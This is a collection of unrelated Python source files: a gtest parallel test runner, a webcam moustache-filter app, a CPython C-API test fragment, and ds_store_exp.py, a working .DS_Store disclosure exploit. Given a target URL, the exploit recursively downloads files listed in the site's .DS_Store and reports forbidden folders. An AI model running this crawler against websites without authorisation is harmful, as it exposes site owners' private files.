sigint_handler = SigintHandler()
# Return the width of the terminal, or None if it couldn't be
# determined (e.g. because we're not being run interactively).
def term_width(out):
if not out.isatty():
return None
try:
p = subprocess.Popen(["stty", "size"],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(out, err) = p.communicate()
if p.returncode != 0 or err:
return None
return int(out.split()[1])
except (IndexError, OSError, ValueError):
return None
# Output transient and permanent lines of text. If several transient
# lines are written in sequence, the new will overwrite the old. We
# use this to ensure that lots of unimportant info (tests passing)
# won't drown out important info (tests failing).
class Outputter(object):
def __init__(self, out_file):
self.__out_file = out_file
self.__previous_line_was_transient = False
self.__width = term_width(out_file) # Line width, or None if not a tty.
def transient_line(self, msg):
if self.__width is None:
self.__out_file.write(msg + "\n")
else:
self.__out_file.write("\r" + msg[:self.__width].ljust(self.__width))
self.__previous_line_was_transient = True
def flush_transient_output(self):
if self.__previous_line_was_transient:
self.__out_file.write("\n")
self.__previous_line_was_transient = False
def permanent_line(self, msg):
self.flush_transient_output()
self.__out_file.write(msg + "\n")
def get_save_file_path():
"""Return path to file for saving transient data."""
if sys.platform == 'win32':
default_cache_path = os.path.join(os.path.expanduser('~'),
'AppData', 'Local')
cache_path = os.environ.get('LOCALAPPDATA', default_cache_path)
else:
# We don't use xdg module since it's not a standard.
default_cache_path = os.path.join(os.path.expanduser('~'), '.cache')
cache_path = os.environ.get('XDG_CACHE_HOME', default_cache_path)
if os.path.isdir(cache_path):
return os.path.join(cache_path, 'gtest-parallel')
else:
sys.stderr.write('Directory {} does not exist\n'.format(cache_path))
return os.path.join(os.path.expanduser('~'), '.gtest-parallel-times')
@total_ordering
class Task(object):
"""Stores information about a task (single execution of a test).
This class stores information about the test to be executed (gtest binary and
test name), and its result (log file, exit code and runtime).
Each task is uniquely identified by the gtest binary, the test name and an
execution number that increases each time the test is executed.
Additionally we store the last execution time, so that next time the test is
executed, the slowest tests are run first.
"""
def __init__(self, test_binary, test_name, test_command, execution_number,
last_execution_time, output_dir):
self.test_name = test_name
self.output_dir = output_dir
self.test_binary = test_binary
self.test_command = test_command
self.execution_number = execution_number
self.last_execution_time = last_execution_time
self.exit_code = None
self.runtime_ms = None
self.test_id = (test_binary, test_name)
self.task_id = (test_binary, test_name, self.execution_number)
self.log_file = Task._logname(self.output_dir, self.test_binary,
test_name, self.execution_number)
def __sorting_key(self):
# Unseen or failing tests (both missing execution time) take precedence over
# execution time. Tests are greater (seen as slower) when missing times so
# that they are executed first.
return (1 if self.last_execution_time is None else 0,
self.last_execution_time)
def __eq__(self, other):
return self.__sorting_key() == other.__sorting_key()
def __ne__(self, other):
return not (self == other)
def __lt__(self, other):
return self.__sorting_key() < other.__sorting_key()
@staticmethod
def _normalize(string):
return re.sub('[^A-Za-z0-9]', '_', string)
@staticmethod
def _logname(output_dir, test_binary, test_name, execution_number):
# Store logs to temporary files if there is no output_dir.
if output_dir is None:
(log_handle, log_name) = tempfile.mkstemp(prefix='gtest_parallel_',
suffix=".log")
os.close(log_handle)
return log_name
log_name = '%s-%s-%d.log' % (Task._normalize(os.path.basename(test_binary)),
Task._normalize(test_name), execution_number)
return os.path.join(output_dir, log_name)
def run(self):
begin = time.time()
with open(self.log_file, 'w') as log:
task = subprocess.Popen(self.test_command, stdout=log, stderr=log)
try:
self.exit_code = sigint_handler.wait(task)
except sigint_handler.ProcessWasInterrupted:
thread.exit()
self.runtime_ms = int(1000 * (time.time() - begin))
self.last_execution_time = None if self.exit_code else self.runtime_ms
class TaskManager(object):
"""Executes the tasks and stores the passed, failed and interrupted tasks.
When a task is run, this class keeps track if it passed, failed or was
interrupted. After a task finishes it calls the relevant functions of the
Logger, TestResults and TestTimes classes, and in case of failure, retries the
test as specified by the --retry_failed flag.
"""
def __init__(self, times, logger, test_results, task_factory, times_to_retry,
initial_execution_number):
self.times = times
self.logger = logger
self.test_results = test_results
self.task_factory = task_factory
self.times_to_retry = times_to_retry
self.initial_execution_number = initial_execution_number
self.global_exit_code = 0
self.passed = []
self.failed = []
self.started = {}
self.execution_number = {}
self.lock = threading.Lock()
def __get_next_execution_number(self, test_id):
with self.lock:
next_execution_number = self.execution_number.setdefault(
test_id, self.initial_execution_number)
self.execution_number[test_id] += 1
return next_execution_number
def __register_start(self, task):
with self.lock:
self.started[task.task_id] = task
def __register_exit(self, task):
self.logger.log_exit(task)
self.times.record_test_time(task.test_binary, task.test_name,
task.last_execution_time)
if self.test_results:
self.test_results.log(task.test_name, task.runtime_ms,
"PASS" if task.exit_code == 0 else "FAIL")
with self.lock:
self.started.pop(task.task_id)
if task.exit_code == 0:
self.passed.append(task)
else:
self.failed.append(task)
def run_task(self, task):
for try_number in range(self.times_to_retry + 1):
self.__register_start(task)
task.run()
self.__register_exit(task)
if task.exit_code == 0:
break
if try_number < self.times_to_retry:
execution_number = self.__get_next_execution_number(task.test_id)
# We need to create a new Task instance. Each task represents a single test
# execution, with its own runtime, exit code and log file.
task = self.task_factory(task.test_binary, task.test_name,
task.test_command, execution_number,
task.last_execution_time, task.output_dir)
with self.lock:
if task.exit_code != 0:
self.global_exit_code = task.exit_code
class FilterFormat(object):
def __init__(self, output_dir):
if sys.stdout.isatty():
# stdout needs to be unbuffered since the output is interactive.
if isinstance(sys.stdout, io.TextIOWrapper):
# workaround for https://bugs.python.org/issue17404
sys.stdout = io.TextIOWrapper(sys.stdout.detach(),
line_buffering=True,
write_through=True,
newline='\n')
else:
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
self.output_dir = output_dir
self.total_tasks = 0
self.finished_tasks = 0
self.out = Outputter(sys.stdout)
self.stdout_lock = threading.Lock()
def move_to(self, destination_dir, tasks):
if self.output_dir is None:
return
destination_dir = os.path.join(self.output_dir, destination_dir)
os.makedirs(destination_dir)
for task in tasks:
shutil.move(task.log_file, destination_dir)
def print_tests(self, message, tasks, print_try_number):
self.out.permanent_line("%s (%s/%s):" %
(message, len(tasks), self.total_tasks))
for task in sorted(tasks):
runtime_ms = 'Interrupted'
if task.runtime_ms is not None:
runtime_ms = '%d ms' % task.runtime_ms
self.out.permanent_line("%11s: %s %s%s" % (
runtime_ms, task.test_binary, task.test_name,
(" (try #%d)" % task.execution_number) if print_try_number else ""))
def log_exit(self, task):
with self.stdout_lock:
self.finished_tasks += 1
self.out.transient_line("[%d/%d] %s (%d ms)"
% (self.finished_tasks, self.total_tasks,
task.test_name, task.runtime_ms))
if task.exit_code != 0:
with open(task.log_file) as f:
for line in f.readlines():
self.out.permanent_line(line.rstrip())
self.out.permanent_line(
"[%d/%d] %s returned/aborted with exit code %d (%d ms)"
% (self.finished_tasks, self.total_tasks, task.test_name,
task.exit_code, task.runtime_ms))
if self.output_dir is None:
# Try to remove the file 100 times (sleeping for 0.1 second in between).
# This is a workaround for a process handle seemingly holding on to the
# file for too long inside os.subprocess. This workaround is in place
# until we figure out a minimal repro to report upstream (or a better
# suspect) to prevent os.remove exceptions.
num_tries = 100
for i in range(num_tries):
try:
os.remove(task.log_file)
except OSError as e:
if e.errno != errno.ENOENT:
if i == num_tries - 1:
self.out.permanent_line('Could not remove temporary log file: ' + str(e))
else:
time.sleep(0.1)
continue
break
def log_tasks(self, total_tasks):
self.total_tasks += total_tasks
self.out.transient_line("[0/%d] Running tests..." % self.total_tasks)
def summarize(self, passed_tasks, failed_tasks, interrupted_tasks):
stats = {}
def add_stats(stats, task, idx):
task_key = (task.test_binary, task.test_name)
if not task_key in stats:
# (passed, failed, interrupted) task_key is added as tie breaker to get
# alphabetic sorting on equally-stable tests
stats[task_key] = [0, 0, 0, task_key]
stats[task_key][idx] += 1
for task in passed_tasks:
add_stats(stats, task, 0)
for task in failed_tasks:
add_stats(stats, task, 1)
for task in interrupted_tasks:
add_stats(stats, task, 2)
self.out.permanent_line("SUMMARY:")
for task_key in sorted(stats, key=stats.__getitem__):
(num_passed, num_failed, num_interrupted, _) = stats[task_key]
(test_binary, task_name) = task_key
self.out.permanent_line(
" %s %s passed %d / %d times%s." %
(test_binary, task_name, num_passed,
num_passed + num_failed + num_interrupted,
"" if num_interrupted == 0 else (" (%d interrupted)" % num_interrupted)))
def flush(self):
self.out.flush_transient_output()
class CollectTestResults(object):
def __init__(self, json_dump_filepath):
self.test_results_lock = threading.Lock()
self.json_dump_file = open(json_dump_filepath, 'w')
self.test_results = {
"interrupted": False,
"path_delimiter": ".",
# Third version of the file format. See the link in the flag description
# for details.
"version": 3,
"seconds_since_epoch": int(time.time()),
"num_failures_by_type": {
"PASS": 0,
"FAIL": 0,
},
"tests": {},
}
def log(self, test, runtime_ms, actual_result):
with self.test_results_lock:
self.test_results['num_failures_by_type'][actual_result] += 1
results = self.test_results['tests']
for name in test.split('.'):
results = results.setdefault(name, {})
if results:
results['actual'] += ' ' + actual_result
results['times'].append(runtime_ms)
else: # This is the first invocation of the test
results['actual'] = actual_result
results['times'] = [runtime_ms]
results['time'] = runtime_ms
results['expected'] = 'PASS'
def dump_to_file_and_close(self):
json.dump(self.test_results, self.json_dump_file)
self.json_dump_file.close()
# Record of test runtimes. Has built-in locking.
class TestTimes(object):
class LockedFile(object):
def __init__(self, filename, mode):
self._filename = filename
self._mode = mode
self._fo = None
def __enter__(self):
self._fo = open(self._filename, self._mode)
# Regardless of opening mode we always seek to the beginning of file.
# This simplifies code working with LockedFile and also ensures that
# we always lock (and unlock below) the same region of the file on win32.
self._fo.seek(0)
try:
if sys.platform == 'win32':
# We lock a fixed location in the file here to use it as
# an exclusive lock on the entire file.
msvcrt.locking(self._fo.fileno(), msvcrt.LK_LOCK, 1)
else:
fcntl.flock(self._fo.fileno(), fcntl.LOCK_EX)
except IOError:
self._fo.close()
raise
return self._fo
def __exit__(self, exc_type, exc_value, traceback):
# Flush any buffered data to disk. This is needed to prevent a race
# condition in the window between releasing the file lock and
# closing the file.
self._fo.flush()
try:
if sys.platform == 'win32':
self._fo.seek(0)
msvcrt.locking(self._fo.fileno(), msvcrt.LK_UNLCK, 1)
else:
fcntl.flock(self._fo.fileno(), fcntl.LOCK_UN)
finally:
self._fo.close()
return exc_value is None
def __init__(self, save_file):
"Create new object seeded with saved test times from the given file."
self.__times = {} # (test binary, test name) -> runtime in ms
# Protects calls to record_test_time(); other calls are not
# expected to be made concurrently.
self.__lock = threading.Lock()
try:
with TestTimes.LockedFile(save_file, 'rb') as fd:
times = TestTimes.__read_test_times_file(fd)
except IOError:
# We couldn't obtain the lock.
return
# Discard saved times if the format isn't right.
if type(times) is not dict:
return
for ((test_binary, test_name), runtime) in times.items():
if (type(test_binary) is not str or type(test_name) is not str
or type(runtime) not in {int, long, type(None)}):
return
self.__times = times
def get_test_time(self, binary, testname):
"""Return the last duration for the given test as an integer number of
milliseconds, or None if the test failed or if there's no record for it."""
return self.__times.get((binary, testname), None)
def record_test_time(self, binary, testname, runtime_ms):
"""Record that the given test ran in the specified number of
milliseconds. If the test failed, runtime_ms should be None."""
with self.__lock:
self.__times[(binary, testname)] = runtime_ms
def write_to_file(self, save_file):
"Write all the times to file."
try:
with TestTimes.LockedFile(save_file, 'a+b') as fd:
times = TestTimes.__read_test_times_file(fd)
if times is None:
times = self.__times
else:
times.update(self.__times)
# We erase the file's data while still holding a lock on it. This
# way reading the old test times and appending new ones is atomic
# from the point of view of an external reader.
fd.seek(0)
fd.truncate()
with gzip.GzipFile(fileobj=fd, mode='wb') as gzf:
cPickle.dump(times, gzf, PICKLE_HIGHEST_PROTOCOL)
except IOError:
pass # ignore errors---saving the times isn't that important
@staticmethod
def __read_test_times_file(fd):
try:
with gzip.GzipFile(fileobj=fd, mode='rb') as gzf:
times = cPickle.load(gzf)
except Exception:
# File doesn't exist, isn't readable, is malformed---whatever.
# Just ignore it.
return None
else:
return times
def find_tests(binaries, additional_args, options, times):
test_count = 0
tasks = []
for test_binary in binaries:
command = [test_binary]
if options.gtest_also_run_disabled_tests:
command += ['--gtest_also_run_disabled_tests']
list_command = command + ['--gtest_list_tests']
if options.gtest_filter != '':
list_command += ['--gtest_filter=' + options.gtest_filter]
try:
test_list = subprocess.check_output(list_command,
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
sys.exit("%s: %s\n%s" % (test_binary, str(e), e.output))
try:
test_list = test_list.split('\n')
except TypeError:
# subprocess.check_output() returns bytes in python3
test_list = test_list.decode(sys.stdout.encoding).split('\n')
command += additional_args + ['--gtest_color=' + options.gtest_color]
test_group = ''
for line in test_list:
if not line.strip():
continue
if line[0] != " ":
# Remove comments for typed tests and strip whitespace.
test_group = line.split('#')[0].strip()
continue
# Remove comments for parameterized tests and strip whitespace.
line = line.split('#')[0].strip()
if not line:
continue
test_name = test_group + line
if not options.gtest_also_run_disabled_tests and 'DISABLED_' in test_name:
continue
last_execution_time = times.get_test_time(test_binary, test_name)
if options.failed and last_execution_time is not None:
continue
test_command = command + ['--gtest_filter=' + test_name]
if (test_count - options.shard_index) % options.shard_count == 0:
for execution_number in range(options.repeat):
tasks.append(Task(test_binary, test_name, test_command,
execution_number + 1, last_execution_time,
options.output_dir))
test_count += 1
# Sort the tasks to run the slowest tests first, so that faster ones can be
# finished in parallel.
return sorted(tasks, reverse=True)
def execute_tasks(tasks, pool_size, task_manager,
timeout, serialize_test_cases):
class WorkerFn(object):
def __init__(self, tasks, running_groups):
self.tasks = tasks
self.running_groups = running_groups
self.task_lock = threading.Lock()
def __call__(self):
while True:
with self.task_lock:
for task_id in range(len(self.tasks)):
task = self.tasks[task_id]
if self.running_groups is not None:
test_group = task.test_name.split('.')[0]
if test_group in self.running_groups:
# Try to find other non-running test group.
continue
else:
self.running_groups.add(test_group)
del self.tasks[task_id]
break
else:
# Either there are no tasks left or the number of remaining test
# cases (groups) is less than the number of running threads.
return
task_manager.run_task(task)
if self.running_groups is not None:
with self.task_lock:
self.running_groups.remove(test_group)
def start_daemon(func):
t = threading.Thread(target=func)
t.daemon = True
t.start()
return t
try:
if timeout:
timeout.start()
running_groups = set() if serialize_test_cases else None
worker_fn = WorkerFn(tasks, running_groups)
workers = [start_daemon(worker_fn) for _ in range(pool_size)]
for worker in workers:
worker.join()
finally:
if timeout:
timeout.cancel()
def default_options_parser():
parser = optparse.OptionParser(
usage = 'usage: %prog [options] binary [binary ...] -- [additional args]')
parser.add_option('-d', '--output_dir', type='string', default=None,
help='Output directory for test logs. Logs will be '
'available under gtest-parallel-logs/, so '
'--output_dir=/tmp will result in all logs being '
'available under /tmp/gtest-parallel-logs/.')
parser.add_option('-r', '--repeat', type='int', default=1,
help='Number of times to execute all the tests.')
parser.add_option('--retry_failed', type='int', default=0,
help='Number of times to repeat failed tests.')
parser.add_option('--failed', action='store_true', default=False,
help='run only failed and new tests')
parser.add_option('-w', '--workers', type='int',
default=multiprocessing.cpu_count(),
help='number of workers to spawn')
parser.add_option('--gtest_color', type='string', default='yes',
help='color output')
parser.add_option('--gtest_filter', type='string', default='',
help='test filter')
parser.add_option('--gtest_also_run_disabled_tests', action='store_true',
default=False, help='run disabled tests too')
parser.add_option('--print_test_times', action='store_true', default=False,
help='list the run time of each test at the end of execution')
parser.add_option('--shard_count', type='int', default=1,
help='total number of shards (for sharding test execution '
'between multiple machines)')
parser.add_option('--shard_index', type='int', default=0,
help='zero-indexed number identifying this shard (for '
'sharding test execution between multiple machines)')
parser.add_option('--dump_json_test_results', type='string', default=None,
help='Saves the results of the tests as a JSON machine-'
'readable file. The format of the file is specified at '
'https://www.chromium.org/developers/the-json-test-results-format')
parser.add_option('--timeout', type='int', default=None,
help='Interrupt all remaining processes after the given '
'time (in seconds).')
parser.add_option('--serialize_test_cases', action='store_true',
default=False, help='Do not run tests from the same test '
'case in parallel.')
return parser
def main():
# Remove additional arguments (anything after --).
additional_args = []
for i in range(len(sys.argv)):
if sys.argv[i] == '--':
additional_args = sys.argv[i+1:]
sys.argv = sys.argv[:i]
break
parser = default_options_parser()
(options, binaries) = parser.parse_args()
if (options.output_dir is not None and
not os.path.isdir(options.output_dir)):
parser.error('--output_dir value must be an existing directory, '
'current value is "%s"' % options.output_dir)
# Append gtest-parallel-logs to the log output path; this avoids deleting user
# data if a user passes a directory where files are already present. If a
# user specifies --output_dir=Docs/, we'll create Docs/gtest-parallel-logs
# and clean that directory out on startup, instead of nuking Docs/.
if options.output_dir:
options.output_dir = os.path.join(options.output_dir,
'gtest-parallel-logs')
if binaries == []:
parser.print_usage()
sys.exit(1)
if options.shard_count < 1:
parser.error("Invalid number of shards: %d. Must be at least 1." %
options.shard_count)
if not (0 <= options.shard_index < options.shard_count):
parser.error("Invalid shard index: %d. Must be between 0 and %d "
"(less than the number of shards)." %
(options.shard_index, options.shard_count - 1))
# Check that all test binaries have a unique basename. That way we can ensure
# the logs are saved to unique files even when two different binaries have
# common tests.
unique_binaries = set(os.path.basename(binary) for binary in binaries)
assert len(unique_binaries) == len(binaries), (
"All test binaries must have an unique basename.")
if options.output_dir:
# Remove files from old test runs.
if os.path.isdir(options.output_dir):
shutil.rmtree(options.output_dir)
# Create directory for test log output.
try:
os.makedirs(options.output_dir)
except OSError as e:
# Ignore errors if this directory already exists.
if e.errno != errno.EEXIST or not os.path.isdir(options.output_dir):
raise e
timeout = None
if options.timeout is not None:
timeout = threading.Timer(options.timeout, sigint_handler.interrupt)
test_results = None
if options.dump_json_test_results is not None:
test_results = CollectTestResults(options.dump_json_test_results)
save_file = get_save_file_path()
times = TestTimes(save_file)
logger = FilterFormat(options.output_dir)
task_manager = TaskManager(times, logger, test_results, Task,
options.retry_failed, options.repeat + 1)
tasks = find_tests(binaries, additional_args, options, times)
logger.log_tasks(len(tasks))
execute_tasks(tasks, options.workers, task_manager,
timeout, options.serialize_test_cases)
print_try_number = options.retry_failed > 0 or options.repeat > 1
if task_manager.passed:
logger.move_to('passed', task_manager.passed)
if options.print_test_times:
logger.print_tests('PASSED TESTS', task_manager.passed, print_try_number)
if task_manager.failed:
logger.print_tests('FAILED TESTS', task_manager.failed, print_try_number)
logger.move_to('failed', task_manager.failed)
if task_manager.started:
logger.print_tests(
'INTERRUPTED TESTS', task_manager.started.values(), print_try_number)
logger.move_to('interrupted', task_manager.started.values())
if options.repeat > 1 and (task_manager.failed or task_manager.started):
logger.summarize(task_manager.passed, task_manager.failed,
task_manager.started.values())
logger.flush()
times.write_to_file(save_file)
if test_results:
test_results.dump_to_file_and_close()
if sigint_handler.got_sigint():
return -signal.SIGINT
return task_manager.global_exit_code
if __name__ == "__main__":
sys.exit(main())
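# Example invocations (illustrative only; the binary names are made up, the
# flags are the ones defined in default_options_parser() above):
#
#   python gtest_parallel.py ./foo_unittests
#   python gtest_parallel.py -w 8 -r 3 --output_dir=/tmp ./foo_unittests ./bar_unittests
#   python gtest_parallel.py ./foo_unittests -- --gtest_break_on_failure
#
# Arguments after "--" are passed through unchanged to each test binary.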
|
main_movember.py
|
from tkinter import *
from PIL import Image
from PIL import ImageTk
import cv2, threading, os, time
from threading import Thread
from os import listdir
from os.path import isfile, join
import random
import dlib
from imutils import face_utils, rotate_bound
import math
def draw_sprite(frame, sprite, x_offset, y_offset):
(h,w) = (sprite.shape[0], sprite.shape[1])
(imgH,imgW) = (frame.shape[0], frame.shape[1])
if y_offset+h >= imgH: #if sprite gets out of image in the bottom
sprite = sprite[0:imgH-y_offset,:,:]
if x_offset+w >= imgW: #if sprite gets out of image to the right
sprite = sprite[:,0:imgW-x_offset,:]
if x_offset < 0: #if sprite gets out of image to the left
sprite = sprite[:,abs(x_offset)::,:]
w = sprite.shape[1]
x_offset = 0
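# Per-channel alpha compositing: the sprite's 4th channel (alpha, 0-255) acts
# as a blend weight, so result = sprite*alpha + frame*(1-alpha) for each BGR
# channel inside the region the sprite covers.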
for c in range(3):
frame[y_offset:y_offset+h, x_offset:x_offset+w, c] = \
sprite[:,:,c] * (sprite[:,:,3]/255.0) + frame[y_offset:y_offset+h, x_offset:x_offset+w, c] * (1.0 - sprite[:,:,3]/255.0)
return frame
def adjust_sprite2head(sprite, head_width, head_ypos, ontop = True):
(h_sprite,w_sprite) = (sprite.shape[0], sprite.shape[1])
factor = 1.0*head_width/w_sprite
sprite = cv2.resize(sprite, (0,0), fx=factor, fy=factor) # adjust to have the same width as head
(h_sprite,w_sprite) = (sprite.shape[0], sprite.shape[1])
y_orig = head_ypos-h_sprite if ontop else head_ypos
if (y_orig < 0): #check if the head is not to close to the top of the image and the sprite would not fit in the screen
sprite = sprite[abs(y_orig)::,:,:] #in that case, we cut the sprite
y_orig = 0 #the sprite then begins at the top of the image
return (sprite, y_orig)
def apply_sprite(image, path2sprite,w,x,y, angle, ontop = True):
sprite = cv2.imread(path2sprite,-1)
#print sprite.shape
sprite = rotate_bound(sprite, angle)
(sprite, y_final) = adjust_sprite2head(sprite, w, y, ontop)
image = draw_sprite(image,sprite,x, y_final)
def calculate_inclination(point1, point2):
x1,x2,y1,y2 = point1[0], point2[0], point1[1], point2[1]
incl = 180/math.pi*math.atan((float(y2-y1))/(x2-x1))
return incl
def calculate_boundbox(list_coordinates):
x = min(list_coordinates[:,0])
y = min(list_coordinates[:,1])
w = max(list_coordinates[:,0]) - x
h = max(list_coordinates[:,1]) - y
return (x,y,w,h)
def get_face_boundbox(points, face_part):
if face_part == 1:
(x,y,w,h) = calculate_boundbox(points[17:22]) #left eyebrow
elif face_part == 2:
(x,y,w,h) = calculate_boundbox(points[22:27]) #right eyebrow
elif face_part == 3:
(x,y,w,h) = calculate_boundbox(points[36:42]) #left eye
elif face_part == 4:
(x,y,w,h) = calculate_boundbox(points[42:48]) #right eye
elif face_part == 5:
(x,y,w,h) = calculate_boundbox(points[29:36]) #nose
elif face_part == 6:
(x,y,w,h) = calculate_boundbox(points[48:68]) #mouth
return (x,y,w,h)
def cvloop(run_event):
global panelA
global SPRITES
dir_ = "./sprites/flyes/"
flies = [f for f in listdir(dir_) if isfile(join(dir_, f))] #image of flies to make the "animation"
i = 0
video_capture = cv2.VideoCapture(0) #read from webcam
fps = video_capture.get(cv2.CAP_PROP_FPS)
print(fps)
(x,y,w,h) = (0,0,10,10) #whatever initial values
#Filters path
detector = dlib.get_frontal_face_detector()
#Facial landmarks
print("[INFO] loading facial landmark predictor...")
model = "filters/shape_predictor_68_face_landmarks.dat"
predictor = dlib.shape_predictor(model) # link to model: http://dlib.net/files/shape_predictor_68_face_landmarks.dat.bz2
set_var = 1
temp = 0
while run_event.is_set(): #while the thread is active we loop
ret, image = video_capture.read()
#height, width, layers = image.shape #EDIT HERE FOR RESIZE
#print(height,width,layers)
new_h = 1080
new_w = 1440
image = cv2.resize(image, (new_w, new_h))
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = detector(gray, 0)
#print(len(faces))
if len(faces) != temp:
temp = len(faces)
set_var = 1
apply_sprite(image, "./sprites/topbanner.png",1080,0,200,0)
apply_sprite(image, "./sprites/bottomborder1.png",1080,0,800,0)
apply_sprite(image, "./sprites/text.png",80,600,640,0)
for face in faces: #if there are faces
(x,y,w,h) = (face.left(), face.top(), face.width(), face.height())
# *** Facial Landmarks detection
shape = predictor(gray, face)
shape = face_utils.shape_to_np(shape)
incl = calculate_inclination(shape[17], shape[26]) #inclination based on eyebrows
# condition to see if mouth is open
is_mouth_open = (shape[66][1] - shape[62][1]) >= 10 #y coordinates of landmark points of the lips
if SPRITES[1]:
(x1,y1,w1,h1) = get_face_boundbox(shape, 6)
if set_var == 1:
mvar = random.choice([1,2,3,4])
gvar = random.choice([1,2,3,4])
set_var = 0
if mvar == 1:
apply_sprite(image, "./sprites/moustache.png",w1+50,x1-25,y1+10, incl)
elif mvar == 2:
apply_sprite(image, "./sprites/moustache2.png",w1+65,x1-32,y1+92, incl)
elif mvar == 3:
apply_sprite(image, "./sprites/moustache3.png",w1+60,x1-30,y1+20, incl)
elif mvar == 4:
apply_sprite(image, "./sprites/moustache4.png",w1+110,x1-52,y1+25, incl)
(x3,y3,_,h3) = get_face_boundbox(shape, 1)
if gvar == 1:
apply_sprite(image, "./sprites/glasses1.png",w,x,y3, incl, ontop = False)
elif gvar == 2:
apply_sprite(image, "./sprites/glasses2.png",w,x,y3, incl, ontop = False)
elif gvar == 3:
apply_sprite(image, "./sprites/glasses3.png",w,x,y3, incl, ontop = False)
elif gvar == 4:
apply_sprite(image, "./sprites/glasses4.png",w,x,y3, incl, ontop = False)
# OpenCV represents images as BGR but PIL expects RGB, so we need to swap the channel order
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# converts to PIL format
image = Image.fromarray(image)
# Converts to a TK format to visualize it in the GUI
image = ImageTk.PhotoImage(image)
#cv2.imshow('frame',image)
# Update the image in the panel to show it
panelA.configure(image=image)
panelA.image = image
video_capture.release()
root = Tk()
root.title("Movember Promo")
this_dir = os.path.dirname(os.path.realpath(__file__))
imgicon = PhotoImage(file=os.path.join(this_dir,'imgs/icon.gif'))
root.tk.call('wm', 'iconphoto', root._w, imgicon)
panelA = Label(root)
panelA.pack( padx=10, pady=10)
SPRITES = [0,1,0,0,0]
run_event = threading.Event()
run_event.set()
action = Thread(target=cvloop, args=(run_event,))
action.setDaemon(True)
action.start()
def terminate():
global root, run_event, action
print ("Closing thread opencv...")
run_event.clear()
time.sleep(1)
#action.join() #strangely in Linux this thread does not terminate properly, so .join never finishes
root.destroy()
print ("All closed! Ciao")
root.protocol("WM_DELETE_WINDOW", terminate)
root.mainloop() #creates loop of GUI
|
ds_store_exp.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# LiJiejie my[at]lijiejie.com http://www.lijiejie.com
import sys
import urllib2
import cStringIO
import urlparse
import os
import Queue
import threading
from lib.ds_store import DSStore
class Scanner(object):
def __init__(self, start_url):
self.queue = Queue.Queue()
self.queue.put(start_url)
self.processed_url = set()
self.lock = threading.Lock()
self.working_thread = 0
def process(self):
while True:
try:
url = self.queue.get(timeout=2.0)
self.lock.acquire()
self.working_thread += 1
self.lock.release()
except Exception, e:
if self.working_thread == 0:
break
else:
continue
try:
if url in self.processed_url:
pass
else:
self.processed_url.add(url)
base_url = url[:-len('.DS_Store')] if url.endswith('.DS_Store') else url  # str.rstrip would strip a character set, not the '.DS_Store' suffix
if not url.lower().startswith('http'):
url = 'http://%s' % url
schema, netloc, path, _, _, _ = urlparse.urlparse(url, 'http')
try:
response = urllib2.urlopen(url)
except Exception, e:
if str(e) == 'HTTP Error 403: Forbidden':
self.lock.acquire()
print '[Folder Found] %s' % url
self.lock.release()
continue
data = response.read()
if response.code == 200:
folder_name = netloc.replace(':', '_') + '/'.join(path.split('/')[:-1])
if not os.path.exists(folder_name):
os.makedirs(folder_name)
with open(netloc.replace(':', '_') + path, 'wb') as outFile:
self.lock.acquire()
print '[+] %s' % url
self.lock.release()
outFile.write(data)
if url.endswith('.DS_Store'):
ds_store_file = cStringIO.StringIO()
ds_store_file.write(data)
d = DSStore.open(ds_store_file)
dirs_files = set()
for x in d.traverse():
dirs_files.add(x.filename)
for name in dirs_files:
if name != '.':
self.queue.put(base_url + name)
self.queue.put(base_url + name + '/.DS_Store')
d.close()
except:
pass
finally:
self.working_thread -= 1
def scan(self):
all_threads = []
for i in range(10):
t = threading.Thread(target=self.process)
all_threads.append(t)
t.start()
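# --- hedged sketch (not part of the original exploit) ---
# The scanner above feeds downloaded bytes into lib.ds_store.DSStore through a
# cStringIO buffer. Assuming the same DSStore API (open / traverse / filename /
# close), an already-downloaded .DS_Store file can be inspected locally:
def list_ds_store_entries(path):
    with open(path, 'rb') as f:
        buf = cStringIO.StringIO(f.read())
    d = DSStore.open(buf)
    names = sorted(set(entry.filename for entry in d.traverse()))
    d.close()
    return names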
if __name__ == '__main__':
if len(sys.argv) == 1:
print 'A .DS_Store file disclosure exploit. By LiJieJie'
print
print 'It parses .DS_Store files and downloads the referenced files recursively.'
print
print ' Usage: python ds_store_exp.py http://www.example.com/.DS_Store'
sys.exit(0)
s = Scanner(sys.argv[1])
s.scan()
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import os
import pickle
import random
import subprocess
import sys
import time
import unittest
from test import support
from test.support import MISSING_C_DOCSTRINGS
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
import _testcapi
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
